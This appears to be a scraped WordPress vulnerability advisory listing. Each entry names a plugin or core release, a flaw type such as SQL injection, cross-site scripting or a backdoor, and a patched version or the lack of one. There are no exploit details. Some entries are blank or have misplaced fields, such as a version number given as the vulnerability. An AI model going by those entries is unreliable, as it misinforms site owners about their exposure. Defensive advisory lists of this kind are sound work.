Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery to Plugin Activation
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Easy Plugin for AdSense

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.10
Recommended Action: Update to version 6.10, or a newer patched version

Plugin: Testimonial Rotator

Plugin: Asgaros Forum

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.15.13
Recommended Action: Update to version 1.15.13, or a newer patched version

Plugin: Taskbuilder – WordPress Project & Task Management plugin

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: IDOR to Sensitive Information Disclosure
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Favicon by RealFaviconGenerator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.23
Recommended Action: Update to version 1.3.23, or a newer patched version

Plugin: bbPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.10
Recommended Action: Update to version 2.5.10, or a newer patched version

Plugin: Donations via PayPal

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.9.9
Recommended Action: Update to version 1.9.9, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Arbitrary File Upload
Patched Version: 3.0.16
Recommended Action: Update to version 3.0.16, or a newer patched version

Plugin: Find and Replace All

Vulnerability: Cross-Site Request Forgery to Arbitrary Content Replacement
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Bypass URL Validation
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Realia

Vulnerability: Arbitrary Post Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form, Survey, Quiz & Popup Form Builder – ARForms

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: ELEX WooCommerce Google Shopping (Google Product Feed)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Donations Made Easy – Smart Donations

Core: WordPress

Vulnerability: Access Control Bypass
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Feeds for YouTube (YouTube video, channel, and gallery plugin)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Unauthenticated Blind SQL Injection via current_page_type
Patched Version: 13.1.6
Recommended Action: Update to version 13.1.6, or a newer patched version

Plugin: All 404 Redirect to Homepage

Vulnerability: Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Open Redirect
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Cross Site Request Forgery
Patched Version: 6.11.4
Recommended Action: Update to version 6.11.4, or a newer patched version

Plugin: Form Store to DB

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Featured Posts by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WP OAuth Server ( Login with WordPress )

Vulnerability: Authentication Bypass
Patched Version: 4.0.1
Recommended Action: Update to version 4.0.1, or a newer patched version

Plugin: ICS Calendar

Vulnerability: Authenticated(Contributor+) Directory Traversal via _url_get_contents
Patched Version: 10.12.0.2
Recommended Action: Update to version 10.12.0.2, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Directory Traversal to Arbitrary File Access
Patched Version: 3.7.16
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.16, 3.8.16, 3.9.14, 4.0.13, 4.1.13, 4.2.10, 4.3.6, 4.4.5, 4.5.4, 4.6.1

Plugin: Realia

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: WP Shopping Pages

Plugin: Contact Form DB

Vulnerability: Cross-Site Scripting
Patched Version: 2.8.20
Recommended Action: Update to version 2.8.20, or a newer patched version

Plugin: Mass Email To users

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via ‘entrant’
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: SEO Rank Reporter

Plugin: Welcart e-Commerce

Vulnerability: SQL Injection
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.6.1
Recommended Action: Update to version 1.2.6.1, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Multiple Vulnerabilities
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via Tag Filter Links
Patched Version: 2.0.13.1
Recommended Action: Update to version 2.0.13.1, or a newer patched version

Plugin: Complete Open Graph

Plugin: Title Experiments Free

Vulnerability: SQL Injection
Patched Version: 9.0.1
Recommended Action: Update to version 9.0.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: 2.9.42
Patched Version: 2.9.42.1
Recommended Action: Update to version 2.9.42.1, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Directory Traversal
Patched Version: 1.14.2.2
Recommended Action: Update to version 1.14.2.2, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Album Gallery – WordPress Gallery

Vulnerability: Cross-Site Request Forgery via album-gallery-column-settings.php
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: affiliate-toolkit – WP Affiliate Plugin with Amazon

Vulnerability: Reflected Cross-Site Scripting via keyword
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: WP Image Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rife Elementor Extensions & Templates

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: VideoWhisper Video Presentation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.31
Recommended Action: Update to version 3.31, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting in Language Settings
Patched Version: 4.7.8
Recommended Action: Update to version 4.7.8, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: seolinkrotator

Plugin: Global Multisite Search

Plugin: CRM and Lead Management by vcita

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.95
Recommended Action: Update to version 3.6.95, or a newer patched version

Plugin: uContext for Amazon

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Better Font Awesome

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Product Slider for WooCommerce by PickPlugins

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.13.22
Recommended Action: Update to version 1.13.22, or a newer patched version

Plugin: KD Coming Soon

Vulnerability: Unauthenticated PHP Object Injection via cetitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail carousel slider

Vulnerability: Stored Cross-Site Scripting and Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Solid Central – Site Management, Backups, Security, and Reporting

Vulnerability: Cross-Site Request Forgery and Missing Authorization via ‘hide_authenticate_notice’
Patched Version: 2.1.14
Recommended Action: Update to version 2.1.14, or a newer patched version

Plugin: User Profile Picture

Vulnerability: Authenticated Insecure Direct Object Reference
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: BuddyPress Extended Friendship Request

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: WP Backup+

Plugin: Subscribe to Category

Plugin: Auto Login New User After Registration

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via alnuar_auto_login_new_user_after_registration_redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Security & Malware scan by CleanTalk

Vulnerability: Missing Authorization
Patched Version: 2.51
Recommended Action: Update to version 2.51, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery via wp_ajax_wp_compression_test
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.05
Recommended Action: Update to version 7.1.05, or a newer patched version

Plugin: Japanized For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: ZoomSounds – WordPress Wave Audio Player with Playlist

Vulnerability: Arbitrary File Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Be POPIA Compliant

Vulnerability: Sensitive Information Exposure
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Core: WordPress

Vulnerability: Shared User Instance Weakness
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Banner Effect Header

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Analyticator

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.9.4
Recommended Action: Update to version 6.4.9.4, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: Easy Google Maps

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.32
Recommended Action: Update to version 1.9.32, or a newer patched version

Plugin: WP 2FA – Two-factor authentication for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Theme My Login

Vulnerability: Local File Inclusion
Patched Version: 6.3.10
Recommended Action: Update to version 6.3.10, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Campaign Message
Patched Version: 3.1.20
Recommended Action: Update to version 3.1.20, or a newer patched version

Plugin: Menu Image, Icons made easy

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: SMTP by BestWebSoft

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: About Author

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Sliced Invoices – WordPress Invoice Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 14.0
Recommended Action: Update to version 14.0, or a newer patched version

Plugin: Popup by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.20
Recommended Action: Update to version 1.10.20, or a newer patched version

Plugin: Image Zoom

Plugin: Simple Job Board

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.10.7
Recommended Action: Update to version 2.10.7, or a newer patched version

Plugin: ANAC XML Bandi di Gara

Plugin: Shortcodes and extra features for Phlox theme

Vulnerability: Reflected Cross-Site-Scripting
Patched Version: 2.9.8
Recommended Action: Update to version 2.9.8, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Missing Authorization
Patched Version: 7.13.55
Recommended Action: Update to version 7.13.55, or a newer patched version

Plugin: Invite Anyone

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: DZS Video Gallery

Plugin: WooCommerce PayPal Payments

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Floating Notification Bar, Sticky Menu on Scroll, Announcement Banner, and Sticky Header for Any Theme – My Sticky Bar (formerly myStickymenu)

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Form Lead Deletion
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Count per Day

Vulnerability: Arbitrary File Download
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: EnvíaloSimple: Email Marketing y Newsletters

Vulnerability: Cross-Site Scripting
Patched Version: 1.98
Recommended Action: Update to version 1.98, or a newer patched version

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.84
Recommended Action: Update to version 4.8.84, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Unauthenticated Stored Cross-Site Scripting via profile_title
Patched Version: 1.0.8.1
Recommended Action: Update to version 1.0.8.1, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcodes
Patched Version: 2.9.12
Recommended Action: Update to version 2.9.12, or a newer patched version

Plugin: wpDataTables (Premium)

Vulnerability: Improper Access Control leading to Table Permission Takeover
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Age Gate

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.16.4
Recommended Action: Update to version 2.16.4, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: Easy Coming Soon

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: Image and Video Lightbox, Image PopUp

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: WordPress Font Uploader

Vulnerability: Arbitrary File Upload
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Elastic Email Sender

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Admin+ Arbitrary File Upload
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.15
Recommended Action: Update to version 2.9.15, or a newer patched version

Plugin: GamePress – The Game Database Plugin

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthenticated Privilege Escalation via User Roles
Patched Version: 2.1.12
Recommended Action: Update to version 2.1.12, or a newer patched version

Plugin: Use-Your-Drive

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.18.3
Recommended Action: Update to version 1.18.3, or a newer patched version

Plugin: Splashscreen

Plugin: FeedWordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2015.0514
Recommended Action: Update to version 2015.0514, or a newer patched version

Plugin: Meteor Slides

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: WP Dark Mode – WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Authenticated (Subscriber+) Local File Inclusion
Patched Version: 5.30.5
Recommended Action: Update to version 5.30.5, or a newer patched version

Plugin: Mailchimp for WooCommerce

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 2.7.2
Recommended Action: Update to version 2.7.2, or a newer patched version

Plugin: adminer

Vulnerability: Security Bypass to Database Login
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-in-One WP Migration and Backup

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: String locator

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 8.1
Recommended Action: Update to version 8.1, or a newer patched version

Core: WordPress

Vulnerability: Revision History Disclosure
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: GD Rating System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Refleced Cross-Site Scripting
Patched Version: 3.2.60
Recommended Action: Update to version 3.2.60, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: MathJax-LaTeX

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 3.7.12
Recommended Action: Update to version 3.7.12, or a newer patched version

Plugin: EELV Newsletter

Vulnerability: Cross-Site Scripting
Patched Version: 4.6.1
Recommended Action: Update to version 4.6.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 2.1.23
Recommended Action: Update to version 2.1.23, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Unauthenticated SQL Injection via cg_Fields
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: SAML Single Sign On – SSO Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.8.76
Recommended Action: Update to version 4.8.76, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Arbitrary File Upload
Patched Version: 2.8.1.2
Recommended Action: Update to version 2.8.1.2, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Unauthorized Settings Change
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Easy Contact Form Pro

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.1.9
Recommended Action: Update to version 1.1.1.9, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Authentication Bypass
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: alfred24 Click & Collect

Vulnerability: Authenticated (Administrator+) Stored Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Aajoda Testimonials

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: FreshMail For WordPress

Plugin: Pricing Deals for WooCommerce

Vulnerability: Missing Authorization via vtprd_ajax_clone_rule
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Register Plus

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom 404 Pro

Vulnerability: Unauthenticated Stored Cross-Site Scripting via logging
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: Star CloudPRNT for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Sensitive Information Exposure
Patched Version: 0.9.2.5
Recommended Action: Update to version 0.9.2.5, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: WP Front-End Repository Manager

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ImageLinks Interactive Image Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Courses LMS – Online Courses Builder, eLearning Courses, Courses Solution, Education Courses

Vulnerability: Missing Authorization
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Cross-Site Request Forgery to Cursor Manipulation
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Core: WordPress

Vulnerability: All known versions
Patched Version: No patched version available
Recommended Action: No known patch available. Review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance.

Plugin: bbPress Toolkit

Plugin: Leaflet Maps Marker Pro

Vulnerability: SQL Injection
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: Duplicate Page and Post

Vulnerability: Malicious Backdoor
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Keap Landing Pages

Plugin: Cookie Bar

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: ThirstyAffiliates – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: MX Time Zone Clocks

Vulnerability: Contributor+ Cross-Site Scripting
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: EventON

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Content Copy Protection & Prevent Image Save

Plugin: WP Shop

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 3.4.3.19
Recommended Action: Update to version 3.4.3.19, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Incorrect Authorization Checks Allowing Post Modification
Patched Version: 1.0.126
Recommended Action: Update to one of the following versions, or a newer patched version: 1.0.126, 2.3.12

Plugin: Virtual Robots.txt

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.10
Recommended Action: Update to version 1.10, or a newer patched version

Plugin: Google XML Sitemap for Images

Vulnerability: Cross-Site Request Forgery via image_sitemap_generate
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: wp-FileManager

Vulnerability: Arbitrary File Upload
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.12
Recommended Action: Update to version 1.2.12, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 118
Recommended Action: Update to version 118, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.53
Recommended Action: Update to version 2.53, or a newer patched version

Plugin: Calendar_plugin

Plugin: LayerSlider

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 6.2.1
Recommended Action: Update to version 6.2.1, or a newer patched version

Plugin: Checkout Field Manager (Checkout Manager) for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.5.7
Recommended Action: Update to version 5.5.7, or a newer patched version

Plugin: WP HTML Author Bio

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loginizer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Simple Retail Menus

Vulnerability: SQL Injection
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Quick Page/Post Redirect Plugin

Vulnerability: Redirect Security Bypass
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Leaflet Maps Marker Pro

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: FileOrganizer – Manage WordPress and Website Files

Vulnerability: Authenticated (Admin+) Arbitrary File Access
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: WP Affiliate Disclosure

Vulnerability: Cross-Site Request Forgery via check_capability
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.8
Recommended Action: Update to version 1.11.8, or a newer patched version

Plugin: Popup Maker and Popup Anything – Popup for opt-ins and Lead Generation Conversions

Vulnerability: Cross Site Request Forgery
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘attach_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Shariff for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.8
